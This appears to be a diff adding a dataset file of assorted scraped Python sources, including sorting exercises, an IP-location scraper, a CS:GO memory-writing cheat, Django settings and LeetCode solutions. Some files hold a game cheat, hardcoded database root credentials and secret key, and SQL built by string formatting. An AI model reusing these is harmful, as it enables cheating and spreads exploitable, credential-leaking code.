diff --git "a/841.jsonl" "b/841.jsonl" new file mode 100644--- /dev/null +++ "b/841.jsonl" @@ -0,0 +1,729 @@ +{"seq_id":"497019010","text":"from model import db, connect_to_db, User, Day\nfrom server import app\n\nif __name__ == \"__main__\":\n # As a convenience, if we run this module interactively, it will leave\n # you in a state of being able to work with the database directly.\n\n connect_to_db(app)\n # print \"Connected to DB.\"\n user = User.query.get(1).username\n with open('cron_db.txt', 'a') as f:\n f.write(user)\n # is_today_logged(1)\n","sub_path":"cron_code/test_cron_db.py","file_name":"test_cron_db.py","file_ext":"py","file_size_in_byte":424,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"136245203","text":"def belong(n,t): #ok\r\n i=0\r\n while ires:\r\n res=element\r\n return res\r\n\r\ndef my_len(t): #ok\r\n cpt=0\r\n for element in t:\r\n cpt=cpt+1\r\n return cpt\r\n\r\ndef map_double(t): #ok\r\n res=[0]*len(t)\r\n for i in range (len(t)):\r\n res[i]=2*t[i]\r\n return res\r\n\r\ndef smallestin(t,i,j): #ok\r\n res=t[i]\r\n for indice in range(i+1,j+1):\r\n if t[indice]i:\r\n res[j-1]=t[j]\r\n return res\r\n\r\ndef my_selection_sent(t): #ok\r\n res=[0]*len(t)\r\n for i in range(len(t)):\r\n j=index_of_the_smallest(t)\r\n res=t[j]\r\n remove(t,j)\r\n\r\ndef index_of_the_smallest(t): #ok\r\n i=0\r\n j=1\r\n for elements in t:\r\n if t[i]=0 and t[i]>T:\r\n t[i+1]=t[i]\r\n i=i-1\r\n t[i+1]= T\r\n return t\r\n\r\ndef selection_sort_in_place(t): # ! Le tableau n'est pas trié !\r\n for i in range (len(t)):\r\n s=smallestin(t,i,len(t)-1)\r\n if s>i:\r\n swap(t,i,s)\r\n return None\r\n\r\ndef insert(t,i): #ok\r\n for current_index in range(i-1,-1,-1):\r\n if t[current_index] > t[current_index+1]:\r\n swap(t,current_index,current_index+1)\r\n else:\r\n break\r\n\r\ndef insertion_sort_in_place(t): #ok\r\n for i in range(1,len(t)):\r\n insert(t,i)\r\n\r\n\r\n\r\n\r\n","sub_path":"Toutes les fonctions vues en classe.py","file_name":"Toutes les fonctions vues en classe.py","file_ext":"py","file_size_in_byte":1963,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"604147512","text":"import time\nimport json\nfrom urllib import parse\nimport requests # install\nfrom bs4 import BeautifulSoup as bs # install\nimport pymysql # install\n\n\nua_baidu = 'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)'\nua = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.131 Safari/537.36'\nheaders = {\n 'User-Agent': ua_baidu\n}\n\n\ndef get_ip_location1(ip):\n location = ''\n r = requests.get('http://www.ip138.com/ips138.asp?ip='+ip, headers=headers)\n r.encoding = 'gbk'\n soup = bs(r.text, 'html.parser')\n li = soup.find('ul').find('li').string\n location = li.split(':')[1]\n return location\n\n\ndef get_ip_location2(ip):\n location = ''\n r = requests.get(\n 'http://ip.taobao.com/service/getIpInfo.php?ip='+ip, headers=headers)\n d = json.loads(r.text)\n data = d['data']\n l = ''\n l += data['country']\n l += data['region']\n l += data['city']\n l += data['isp']\n return l\n\n\ndef get_ip_location(ip):\n location = ''\n r = requests.get('http://whois.pconline.com.cn/ipJson.jsp?ip=' +\n ip+'&json=true', headers=headers)\n d = json.loads(r.text)\n l = ''\n l += d['pro']\n l += d['city']\n l += d['addr']\n return l\n\n# ------------------------------数据库操作---------------------------------\n\n\nCONN_CONFIG = {\n 'host': '120.79.180.139',\n 'user': 'root',\n 'password': '111111',\n 'database': 'blog'\n}\n\n\ndef update_ip():\n conn = pymysql.connect(**CONN_CONFIG)\n cursor = conn.cursor()\n sql = 'SELECT * FROM visitor'\n cursor.execute(sql)\n visitors = cursor.fetchall()\n for v in visitors:\n id = v[0]\n ip = v[1]\n location = v[6]\n if location == None or location == '' or location == ' ':\n sql = 'SELECT location FROM ip_location WHERE ip=\"'+ip+'\"'\n cursor.execute(sql)\n row = cursor.fetchone()\n if row == None: # 未查询到ip匹配的归属地\n l = get_ip_location(ip)\n sql = 'INSERT INTO ip_location(ip,location) VALUES (\"{}\",\"{}\")'.format(\n ip, l)\n cursor.execute(sql)\n conn.commit()\n sql = 'UPDATE visitor SET location=\"{}\" WHERE id=\"{}\"'.format(\n l, id)\n cursor.execute(sql)\n conn.commit()\n print(l)\n # time.sleep(10)\n\n cursor.close()\n conn.close()\n\n\ndef update_article():\n conn = pymysql.connect(**CONN_CONFIG)\n cursor = conn.cursor()\n sql = 'SELECT * FROM article'\n cursor.execute(sql)\n articles = cursor.fetchall()\n\n for article in articles:\n id = article[0]\n title = article[1]\n subtitle = article[2]\n tag = article[3]\n content = article[4]\n content = parse.unquote(content) #解码\n date = str(article[5])\n read_count = article[6]\n last_edit_date = article[7]\n author = article[8]\n author_id = article[9]\n sql='UPDATE article SET content=\"{}\" WHERE id=\"{}\"'.format(pymysql.escape_string(content),id)\n #sql = 'INSERT INTO article_(title,subtitle,tag,content,date,read_count,author,author_id) VALUES (\"{}\",\"{}\",\"{}\",\"{}\",\"{}\",\"{}\",\"{}\",\"{}\")'.format(\n #title, subtitle, tag, pymysql.escape_string(content), date, read_count, author, author_id)\n print(sql)\n cursor.execute(sql)\n conn.commit()\n print('修改文章成功:',title)\n\ndef update_comment():\n conn = pymysql.connect(**CONN_CONFIG)\n cursor = conn.cursor()\n sql = 'SELECT * FROM comment'\n cursor.execute(sql)\n comments = cursor.fetchall()\n\n for comment in comments:\n id=comment[0]\n article_id=comment[1]\n replyname=comment[2]\n replyname = parse.unquote(replyname) #解码\n content=comment[3]\n content = parse.unquote(content) #解码\n sql='UPDATE comment SET replyname=\"{}\",content=\"{}\" WHERE id=\"{}\"'.format(pymysql.escape_string(replyname),pymysql.escape_string(content),id)\n print(sql)\n cursor.execute(sql)\n conn.commit()\n print('修改评论成功:',article_id)\n\n# update_ip()\n# l=get_ip_location3(\"221.204.148.219\")\n# print(l)\n#update_article()\n#update_comment()\n","sub_path":"app/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":4327,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"558806266","text":"import pymem\r\nimport pymem.process\r\nimport keyboard\r\nimport time\r\nimport re\r\nfrom Offsets import *\r\n\r\ndef main():\r\n pm = pymem.Pymem(\"csgo.exe\")\r\n client = pymem.process.module_from_name(pm.process_handle, \"client.dll\").lpBaseOfDll\r\n engine = pymem.process.module_from_name(pm.process_handle, \"engine.dll\").lpBaseOfDll\r\n\r\n rgba = [0, 255, 0]\r\n \r\n while True:\r\n\r\n try:\r\n time.sleep(0.001)\r\n for i in range(32):\r\n entity = pm.read_int(client + dwEntityList + i * 0x10)\r\n if entity:\r\n entity_team_id = pm.read_int(entity + m_iTeamNum)\r\n player = pm.read_int(client + dwLocalPlayer)\r\n player_team = pm.read_int(player + m_iTeamNum)\r\n if entity_team_id != player_team :\r\n pm.write_int(entity + m_clrRender, (rgba[0]))\r\n pm.write_int(entity + m_clrRender + 0x1, (rgba[1]))\r\n pm.write_int(entity + m_clrRender + 0x2, (rgba[2]))\r\n\r\n else:\r\n \tpass\r\n\r\n except Exception as e:\r\n print(e)\r\n\r\nif __name__ == '__main__':\r\n main()","sub_path":"utils/chams.py","file_name":"chams.py","file_ext":"py","file_size_in_byte":1188,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"592361635","text":"import os\nimport json\nfrom datetime import datetime\nfrom statistics import mean\nimport argparse\n\nimport numpy as np\nimport cv2\nfrom sklearn.metrics import accuracy_score, f1_score\n\nimport torch\nfrom torch.utils.data import DataLoader\n\nfrom datasets.llamas import Llamas, match_multi_class, get_lanes_culane, get_lanes_llamas\nfrom models.dla.pose_dla_dcn import get_pose_net\nfrom models.erfnet.erfnet import ERFNet\nfrom models.enet.ENet import ENet\nfrom utils.affinity_fields import decodeAFs\nfrom utils.visualize import tensor2image, create_viz\n\n\nparser = argparse.ArgumentParser('Options for inference with LaneAF models in PyTorch...')\nparser.add_argument('--dataset-dir', type=str, default=None, help='path to dataset')\nparser.add_argument('--output-dir', type=str, default=None, help='output directory for model and logs')\nparser.add_argument('--snapshot', type=str, default=None, help='path to pre-trained model snapshot')\nparser.add_argument('--seed', type=int, default=1, help='set seed to some constant value to reproduce experiments')\nparser.add_argument('--no-cuda', action='store_true', default=False, help='do not use cuda for training')\nparser.add_argument('--save-viz', action='store_true', default=False, help='save visualization depicting intermediate and final results')\n\nargs = parser.parse_args()\n# check args\nif args.dataset_dir is None:\n assert False, 'Path to dataset not provided!'\nif args.snapshot is None:\n assert False, 'Model snapshot not provided!'\n\n# set batch size to 1 for visualization purposes\nargs.batch_size = 1\n\n# setup args\nargs.cuda = not args.no_cuda and torch.cuda.is_available()\nif args.output_dir is None:\n args.output_dir = datetime.now().strftime(\"%Y-%m-%d-%H:%M-infer\")\n args.output_dir = os.path.join('.', 'experiments', 'llamas', args.output_dir)\n\nif not os.path.exists(args.output_dir):\n os.makedirs(args.output_dir)\nelse:\n assert False, 'Output directory already exists!'\n\n# load args used from training snapshot (if available)\nif os.path.exists(os.path.join(os.path.dirname(args.snapshot), 'config.json')):\n with open(os.path.join(os.path.dirname(args.snapshot), 'config.json')) as f:\n json_args = json.load(f)\n # augment infer args with training args for model consistency\n if 'backbone' in json_args.keys():\n args.backbone = json_args['backbone']\n else:\n args.backbone = 'dla34'\n\n# store config in output directory\nwith open(os.path.join(args.output_dir, 'config.json'), 'w') as f:\n json.dump(vars(args), f)\n\n# set random seed\ntorch.manual_seed(args.seed)\nif args.cuda:\n torch.cuda.manual_seed(args.seed)\n\nkwargs = {'batch_size': args.batch_size, 'shuffle': False, 'num_workers': 1}\ntest_loader = DataLoader(Llamas(args.dataset_dir, 'test', False), **kwargs)\n\n# create file handles\nf_log = open(os.path.join(args.output_dir, \"logs.txt\"), \"w\")\n\n# get test set filenames\nfilenames_culane = [os.path.join(args.output_dir, x[len(args.dataset_dir):]) for x in test_loader.dataset.img_list]\nfilenames_culane = [x.replace('color_images', 'outputs_culane').replace('_color_rect.png', '.lines.txt') for x in filenames_culane]\nfilenames_llamas = ['/'.join(x.split('/')[-2:]) for x in test_loader.dataset.img_list]\noutputs_dict = dict()\n\n\n# test function\ndef test(net):\n net.eval()\n out_vid = None\n\n for b_idx, sample in enumerate(test_loader):\n input_img, _, _, _ = sample\n if args.cuda:\n input_img = input_img.cuda()\n\n # do the forward pass\n outputs = net(input_img)[-1]\n\n # convert to arrays\n img = tensor2image(input_img.detach(), np.array(test_loader.dataset.mean), \n np.array(test_loader.dataset.std))\n mask_out = tensor2image(torch.sigmoid(outputs['hm']).repeat(1, 3, 1, 1).detach(), \n np.array([0.0 for _ in range(3)], dtype='float32'), np.array([1.0 for _ in range(3)], dtype='float32'))\n vaf_out = np.transpose(outputs['vaf'][0, :, :, :].detach().cpu().float().numpy(), (1, 2, 0))\n haf_out = np.transpose(outputs['haf'][0, :, :, :].detach().cpu().float().numpy(), (1, 2, 0))\n\n # decode AFs to get lane instances\n seg_out = decodeAFs(mask_out[:, :, 0], vaf_out, haf_out, fg_thresh=128, err_thresh=5)\n\n # re-assign lane IDs to match with ground truth\n seg_out = match_multi_class(seg_out.astype(np.int64))\n\n # get results in CULane output structure\n xy_coords = get_lanes_culane(seg_out, test_loader.dataset.samp_factor)\n # write CULane results to file\n if not os.path.exists(os.path.dirname(filenames_culane[b_idx])):\n os.makedirs(os.path.dirname(filenames_culane[b_idx]))\n with open(filenames_culane[b_idx], 'w') as f:\n f.write('\\n'.join(' '.join(map(str, _lane)) for _lane in xy_coords))\n\n # get results in Llamas output structure\n lanes_dict = get_lanes_llamas(seg_out, test_loader.dataset.samp_factor)\n # store Llamas results to dict\n outputs_dict[filenames_llamas[b_idx]] = lanes_dict\n\n # create video visualization\n if args.save_viz:\n img_out = create_viz(img, seg_out.astype(np.uint8), mask_out, vaf_out, haf_out)\n\n if out_vid is None:\n out_vid = cv2.VideoWriter(os.path.join(args.output_dir, 'out.mkv'), \n cv2.VideoWriter_fourcc(*'H264'), 5, (img_out.shape[1], img_out.shape[0]))\n out_vid.write(img_out)\n\n print('Done with image {} out of {}...'.format(min(args.batch_size*(b_idx+1), len(test_loader.dataset)), len(test_loader.dataset)))\n\n # write Llamas results to file\n with open(os.path.join(args.output_dir, 'outputs_llamas.json'), 'w') as f:\n json.dump(outputs_dict, f)\n\n if args.save_viz:\n out_vid.release()\n\n return\n\nif __name__ == \"__main__\":\n heads = {'hm': 1, 'vaf': 2, 'haf': 1}\n if args.backbone == 'dla34':\n model = get_pose_net(num_layers=34, heads=heads, head_conv=256, down_ratio=4)\n elif args.backbone == 'erfnet':\n model = ERFNet(heads=heads)\n elif args.backbone == 'enet':\n model = ENet(heads=heads)\n\n model.load_state_dict(torch.load(args.snapshot), strict=True)\n if args.cuda:\n model.cuda()\n print(model)\n\n test(model)\n","sub_path":"infer_llamas.py","file_name":"infer_llamas.py","file_ext":"py","file_size_in_byte":6239,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"107783377","text":"from symnum import symToNum\nfrom os import system\nfrom math import ceil\nfrom addCommas import addCommas\n\ndef calculateCost(cost, upgrades): \n RATE = 1.2\n totalCost = 0\n print(\"Upgrade \\t Cost\")\n for i in range(0,upgrades):\n print(\" %d \\t\\t %s\"%((i+1),addCommas(ceil(cost))))\n totalCost+=cost\n cost*=RATE\n totalCost = ceil(totalCost)\n print(\"Total \\t\\t\" + addCommas(totalCost))\n return totalCost\n \n\nexit = False\n\nwhile (exit==False):\n system(\"clear\")\n inputs = input(\"Enter skill costs(any letter to quit):\").split(\",\")\n \n for i in range(0, len(inputs)):\n inputs[i] = symToNum(inputs[i])\n if((len(inputs)==1 and str.isalpha(str(inputs[0]))) or len(inputs)==0):\n exit = True\n continue\n \n n = (input(\"Number of upgrades left:\")).split(\",\")\n \n if(len(inputs)!=len(n)):\n print(\"Unequal argument lengths\\nExiting...\")\n exit = True\n continue\n sumTotal = 0 \n for i in range(0,len(inputs)):\n if(str.isdigit(str(inputs[i])) and str.isdigit(n[i])):\n cost = inputs[i]\n upgrades = int(n[i])\n sumTotal+= calculateCost(cost, upgrades)\n print()\n else:\n exit = True\n continue\n print(\"\\nAggregate cost \\t\" + addCommas(sumTotal))\n input()\n ","sub_path":"Code/Pers/Python/stickmanLegendsSkill.py","file_name":"stickmanLegendsSkill.py","file_ext":"py","file_size_in_byte":1380,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"159901618","text":"from pymongo import MongoClient\nimport redis\nfrom selenium import webdriver\n\n\nclass FeiPinW(object):\n\n def __init__(self):\n self.base_url = \"http://www.feipinzhan.com/company/index.php?catid=0&areaid=0&groupid=&page={}\"\n # chrome_options = webdriver.ChromeOptions()\n # chrome_options.add_argument('--headless')\n # self.driver = webdriver.Chrome(chrome_options=chrome_options)\n self.driver = webdriver.Firefox()\n self.Host = \"127.0.0.1\"\n self.Port = 27017\n self.rPort = 6379\n self.conn = MongoClient(host=self.Host, port=self.Port)\n self.rConn = redis.Redis(host=self.Host, port=self.rPort)\n\n def parse_page(self):\n \"\"\"\n 解析数据\n :return:\n \"\"\"\n company_list = self.driver.find_elements_by_xpath('//*[@class=\"cb insetpaix\"]/div[2]/h2/a')\n number_list = self.driver.find_elements_by_xpath('//*[@class=\"cb insetpaix\"]/div[3]/div[3]/span[1]')\n address_list = self.driver.find_elements_by_xpath('//*[@class=\"cb insetpaix\"]/div[2]/dl/dt[2]')\n type_list = self.driver.find_elements_by_xpath('//*[@class=\"cb insetpaix\"]/div[2]/dl/dt[3]')\n item_list = list()\n length = len(company_list)\n for i in range(length):\n try:\n item = dict()\n item['company'] = company_list[i].text\n item['number'] = number_list[i].text\n item['address'] = address_list[i].text.replace('公司地址:', '')\n item['type'] = type_list[i].text.replace('经营范围:', '')\n item_list.append(item)\n except Exception as e:\n print(e)\n pass\n return item_list\n\n def save_data(self, data):\n \"\"\"\n 保存数据\n :param data:\n :return:\n \"\"\"\n try:\n db = self.conn.FeiPinZ\n col = db.FP\n col.insert(data)\n print(data)\n except Exception as e:\n print(e)\n\n def run(self):\n for i in range(1, 78):\n url = self.base_url.format(i)\n self.driver.get(url)\n self.driver.implicitly_wait(6)\n data_list = self.parse_page()\n for data in data_list:\n self.save_data(data)\n\n\nif __name__ == '__main__':\n FW = FeiPinW()\n FW.run()","sub_path":"August/FeiPin/FeiPinZhan.py","file_name":"FeiPinZhan.py","file_ext":"py","file_size_in_byte":2357,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"381304500","text":"from tkinter import ttk\n\nfrom servis.izvestaji.sopstveni_izvestaj_lekara_servis import poziv_forme_za_prikaz_izvestaja\n\n\nclass FormaIzvestajaLekara:\n\n\n def __init__(self,root,korisnik):\n self._root = root\n self._korisnik = korisnik\n ttk.Label(self._root,text = \"Unesi broj dana za izvestaj: \").pack()\n self.unos = ttk.Entry(self._root)\n self.unos.pack()\n self.dugme = ttk.Button(self._root,text = \"Stampaj izvestaj\",command = self.generisi).pack()\n\n def generisi(self):\n broj_dana = int(self.unos.get())\n poziv_forme_za_prikaz_izvestaja(self._korisnik,broj_dana)\n\n\ndef poziv_forme_za_izvestaj_lekara_sopstveni(root,korisnik):\n FormaIzvestajaLekara(root,korisnik)\n root.mainloop()\n","sub_path":"gui/lekar/generisanje_izvestaja.py","file_name":"generisanje_izvestaja.py","file_ext":"py","file_size_in_byte":748,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"413803595","text":"class Solution:\n def gameOfLife(self, board):\n \"\"\"\n @param board: List[List[int]] = Board representing the cells\n 1 represents live cell,\n 0 represents dead cell\n :return: void => we are modifying board in-place.\n \"\"\"\n if len(board) == 0 or len(board[0]) == 0:\n return\n\n def find_live_neighbor(board, i, j):\n count = 0\n directions = [[i - 1, j - 1], [i - 1, j], [i - 1, j + 1], \\\n [i + 1, j - 1], [i + 1, j], [i + 1, j + 1], \\\n [i, j - 1], [i, j + 1]]\n\n for x, y in directions:\n if x >= 0 and x < len(board) and y >= 0 and y < len(board[0]) and board[x][y] % 2 == 1:\n count += 1\n\n return count\n\n for j in range(len(board[0])):\n for i in range(len(board)):\n ct_of_live_neighbors = find_live_neighbor(board, i, j)\n if (board[i][j] == 0 and ct_of_live_neighbors == 3) or (\n board[i][j] == 1 and ct_of_live_neighbors in [2, 3]):\n board[i][j] |= 2\n\n for j in range(len(board[0])):\n for i in range(len(board)):\n board[i][j] >>= 1\n\n return\n\n","sub_path":"LeetCode/0289_GameOfLife/Solution.py","file_name":"Solution.py","file_ext":"py","file_size_in_byte":1326,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"653413112","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Jul 6 13:34:52 2017\n\n@author: alex\n\"\"\"\nimport pandas as pd\nimport os\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nimport xgboost as xgb\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.model_selection import GridSearchCV\nfrom xgboost.sklearn import XGBRegressor # Sklearn wrapper for XGboost (similar param names)\n\n# --- Load CSVs --- #\nos.chdir('C:/Users/alex/Documents/Mercedes-Kaggle')\n\nX_enc = pd.read_csv('X_enc.csv')\nX_enc = X_enc.set_index('ID')\nX_enc = X_enc.values\ny = pd.read_csv('y.csv', header = None)\ny = y.set_index(0)\ny = y.values.flatten()\n\nX_train, X_test, y_train, y_test = train_test_split(X_enc, y, test_size=0.2, random_state=0)\n\nxgb_1 = XGBRegressor(n_estimators = 100)\nxgb_1.fit(X_train, y_train)\nxgb_1.score(X_train, y_train)\nxgb_1.score(X_test, y_test)\n\nxgb_manytrees = XGBRegressor(n_estimators = 1000)\nxgb_manytrees.fit(X_train, y_train)\nxgb_manytrees.score(X_train, y_train)\nxgb_manytrees.score(X_test, y_test)\n\nxgb_manytrees = XGBRegressor(n_estimators = 500)\nxgb_manytrees.fit(X_train, y_train)\nxgb_manytrees.score(X_train, y_train)\nxgb_manytrees.score(X_test, y_test)\n\n# Crude optimization\nxgb_ = XGBRegressor()\nxgb_grid = GridSearchCV(xgb_,\n {'max_depth': np.arange(1,30, 10),\n 'n_estimators': np.arange(1,5)*100}, n_jobs = 2, verbose=1)\n\nxgb_grid.fit(X_train, y_train)\nprint(xgb_grid.cv_results_['mean_train_score'])\nprint(xgb_grid.cv_results_['mean_test_score'])","sub_path":"Xgboost_basic.py","file_name":"Xgboost_basic.py","file_ext":"py","file_size_in_byte":1502,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"69012727","text":"# Build paths inside the project like this: os.path.join(BASE_DIR, ...)\nimport os\nimport sys\nBASE_DIR = os.path.dirname(os.path.dirname(__file__))\n\n\n# SECURITY WARNING: keep the secret key used in production secret!\nSECRET_KEY = 'oisd#zb6@ns9gg8jb$pc=&_bnr9gbwt+e=xs(%(g_5wqs4y%ga'\n\nDEBUG = os.environ.get('DEBUG') == '1'\n\nTEMPLATE_DEBUG = True\n\nALLOWED_HOSTS = ['*']\n\nINTERNAL_IPS = ('127.0.0.1', '172.17.42.1', )\n\n\n# Application definition\nAUTH_USER_MODEL = 'authentication.Account'\n\nLOGIN_REDIRECT_URL = '/'\nLOGIN_URL = '/login'\n\nINSTALLED_APPS = (\n 'django.contrib.admin',\n 'django.contrib.auth',\n 'django.contrib.contenttypes',\n 'django.contrib.sessions',\n 'django.contrib.messages',\n 'django.contrib.staticfiles',\n 'pipeline',\n 'authentication',\n 'rest_auth',\n 'rest_framework',\n 'rest_framework.authtoken',\n)\n\nMIDDLEWARE_CLASSES = (\n 'django.contrib.sessions.middleware.SessionMiddleware',\n 'django.middleware.common.CommonMiddleware',\n 'django.middleware.csrf.CsrfViewMiddleware',\n 'django.contrib.auth.middleware.AuthenticationMiddleware',\n 'django.contrib.auth.middleware.SessionAuthenticationMiddleware',\n 'django.contrib.messages.middleware.MessageMiddleware',\n 'django.middleware.clickjacking.XFrameOptionsMiddleware',\n)\n\nROOT_URLCONF = 'app.urls'\n\nWSGI_APPLICATION = 'app.wsgi.application'\n\n\n# Debug toolbar\nif DEBUG:\n INSTALLED_APPS += ('debug_toolbar', )\n MIDDLEWARE_CLASSES += ('debug_toolbar.middleware.DebugToolbarMiddleware', )\n\n\n# Database\nif 'RDS_DB_NAME' in os.environ:\n DATABASES = {\n 'default': {\n 'ENGINE': 'django.db.backends.mysql',\n 'NAME': os.environ['RDS_DB_NAME'],\n 'USER': os.environ['RDS_USERNAME'],\n 'PASSWORD': os.environ['RDS_PASSWORD'],\n 'HOST': os.environ['RDS_HOSTNAME'],\n 'PORT': os.environ['RDS_PORT'],\n }\n }\nelse:\n DATABASES = {\n 'default': {\n 'ENGINE': 'django.db.backends.sqlite3',\n 'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),\n }\n }\n\n\n# Internationalization\nLANGUAGE_CODE = 'en-us'\n\nTIME_ZONE = 'UTC'\n\nUSE_I18N = True\n\nUSE_L10N = True\n\nUSE_TZ = True\n\n\n# Static files (CSS, JavaScript, Images)\nSTATICFILES_FINDERS = (\n 'django.contrib.staticfiles.finders.FileSystemFinder',\n 'django.contrib.staticfiles.finders.AppDirectoriesFinder',\n 'pipeline.finders.PipelineFinder',\n)\nSTATICFILES_DIRS = (\n os.path.join(BASE_DIR, 'static'),\n)\nSTATIC_URL = '/static/'\nSTATIC_ROOT = os.path.join(os.path.dirname(BASE_DIR), 'collected_static')\n\n\n# Email settings\nif DEBUG:\n EMAIL_BACKEND = 'django.core.mail.backends.console.EmailBackend'\nEMAIL_HOST = ''\nEMAIL_HOST_USER = ''\nEMAIL_HOST_PASSWORD = ''\nEMAIL_PORT = 25\nEMAIL_USE_TLS = False\nEMAIL_USE_SSL = False\nDEFAULT_FROM_EMAIL = ''\n\n\n# Pipeline static\nif not DEBUG:\n PIPELINE_ENABLED = True\n PIPELINE_DISABLE_WRAPPER = True\nSTATICFILES_STORAGE = 'pipeline.storage.PipelineStorage'\nPIPELINE_CSS_COMPRESSOR = ''\nPIPELINE_JS_COMPRESSOR = ''\n\nPIPELINE_CSS = {\n 'styles': {\n 'source_filenames': (\n 'assets/css/fonts/linecons/css/linecons.css',\n 'assets/css/fonts/fontawesome/css/font-awesome.min.css',\n 'assets/css/bootstrap.min.css',\n 'assets/css/bootstrap-theme.min.css',\n 'assets/css/select.min.css',\n 'assets/css/loading-bar.min.css',\n 'assets/css/angular-toastr.min.css',\n 'style/style.css'\n ),\n 'output_filename': 'styles.css',\n }\n}\n\nPIPELINE_JS = {\n 'assets': {\n 'source_filenames': (\n 'assets/js/jquery.min.js',\n 'assets/js/jquery-ui.min.js',\n 'assets/js/angular.min.js',\n 'assets/js/*.js',\n ),\n 'output_filename': 'assets.js',\n },\n 'app': {\n 'source_filenames': (\n 'app/djangoapp.js',\n 'app/directives/directives.js',\n 'app/directives/**/*.js',\n 'app/services/services.js',\n 'app/services/**/*.js',\n 'app/filters/filters.js',\n 'app/filters/*.js',\n 'app/layout/layout.js',\n 'app/layout/**/*.js',\n 'app/layout/**/**/*.js',\n 'app/demos/demos.js',\n 'app/demos/**/*.js',\n 'app/demos/**/**/*.js',\n 'app/authentication/authentication.js',\n 'app/authentication/**/*.js',\n ),\n 'output_filename': 'app.js',\n }\n}\n\n\n# Templates\nTEMPLATES = [\n {\n 'BACKEND': 'django.template.backends.django.DjangoTemplates',\n 'DIRS': [\n os.path.join(BASE_DIR, 'templates'),\n ],\n 'OPTIONS': {\n 'context_processors': [\n 'django.contrib.auth.context_processors.auth',\n 'django.template.context_processors.debug',\n 'django.template.context_processors.i18n',\n 'django.template.context_processors.media',\n 'django.template.context_processors.static',\n 'django.template.context_processors.tz',\n 'django.contrib.messages.context_processors.messages',\n 'app.context_processors.app_processors',\n ],\n 'loaders': [\n 'django.template.loaders.filesystem.Loader',\n 'django.template.loaders.app_directories.Loader',\n ]\n },\n },\n]\n\n\n# Websocket\nWEBSOCKET_URL = 'ws://{}:{}/'.format(\n os.environ.get('NODEWS_PORT_8080_TCP_ADDR'),\n os.environ.get('NODEWS_PORT_8080_TCP_PORT')\n)\n\n\n# Logging\nLOGGING = {\n 'version': 1,\n 'disable_existing_loggers': False,\n 'formatters': {\n 'detail': {\n 'format': (\n '%(levelname)s %(asctime)s %(pathname)s:%(lineno)s '\n '[%(funcName)s] %(message)s')\n }\n },\n 'handlers': {\n 'stdout': {\n 'level': 'INFO',\n 'class': 'logging.StreamHandler',\n 'formatter': 'detail',\n 'stream': sys.stdout\n }\n },\n 'loggers': {\n 'django': {\n 'handlers': ['stdout'],\n 'level': 'INFO',\n },\n '': {\n 'handlers': ['stdout'],\n 'level': 'INFO',\n }\n }\n}\n","sub_path":"app/app/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":6240,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"107241033","text":"import matplotlib.pyplot as plt\n\nX, Y = [], []\nZ=[]\nfor count,line in enumerate(open('datapoints', 'r')):\n\tif count % 2 == 1:\n\t\tvalues = [float(s) for s in line.split()]\n\t\tX.append(values[0])\n\tif count % 2 == 0:\n\t\tvalues = [float(s) for s in line.split()]\n\t\tY.append(values[0])\n\n#print(X[:10])\n#print(Y[:10])\nfor i in range(len(X)):\n\tZ.append(X[i]*Y[i])\n\nanswer = min(Z)\nplace = Z.index(answer)\nprint('Lowest energy is: '+str(answer))\nprint('Optimal Point has Area: '+str(X[place]))\nprint('Optimal Point has Delay: '+str(Y[place]))\n\nplt.title(\"Delay Area curve\")\nplt.plot(X, Y, 'ro', c='blue',ms='0.50',label='Design Space')\nplt.xlabel(\"Area (units)\")\nplt.ylabel(\"Delay (Geometric Mean)\")\nplt.plot(X[place],Y[place],'bx', c='red',label='Pareto point')\nplt.plot('125444','1','^', c='black',label='Reference')\n#plt.scatter(X, Y, s=None, c=None, marker=None, cmap=None, norm=None, vmin=None, vmax=None, alpha=None)\nplt.autoscale(enable=True, axis='both', tight=None)\nplt.legend()\nplt.show()","sub_path":"Lab1/Scripts/plot1.py","file_name":"plot1.py","file_ext":"py","file_size_in_byte":987,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"54140100","text":"class Solution(object):\n\tdef largestNumber(self, nums):\n\t\t\"\"\"\n\t\t:type nums: List[int]\n\t\t:rtype: str\n\t\t\"\"\"\n\t\tdef compare(x, y):\n\t\t\tif x == y:\n\t\t\t\treturn 0\n\t\t\telif x.startswith(y):\n\t\t\t\tz = y + ''.join([y[0]]*(len(x)-len(y)))\n\t\t\t\tif x+z == z+x:\n\t\t\t\t\treturn -cmp(x+y, y+x)\n\t\t\t\treturn -cmp(x, z)\n\t\t\telif y.startswith(x):\n\t\t\t\tz = x + ''.join([x[0]]*(len(y)-len(x)))\n\t\t\t\tif y+z == z+y:\n\t\t\t\t\treturn -cmp(x+y, y+x)\n\t\t\t\treturn -cmp(z, y)\n\t\t\telse:\n\t\t\t\treturn -cmp(x, y)\n\t\tl = sorted(map(str, nums), cmp=lambda x, y: compare(x, y))\t\t\n\t\tresult = ''.join(l)\n\t\tif result.strip('0') == '':\n\t\t\treturn \"0\"\n\t\treturn 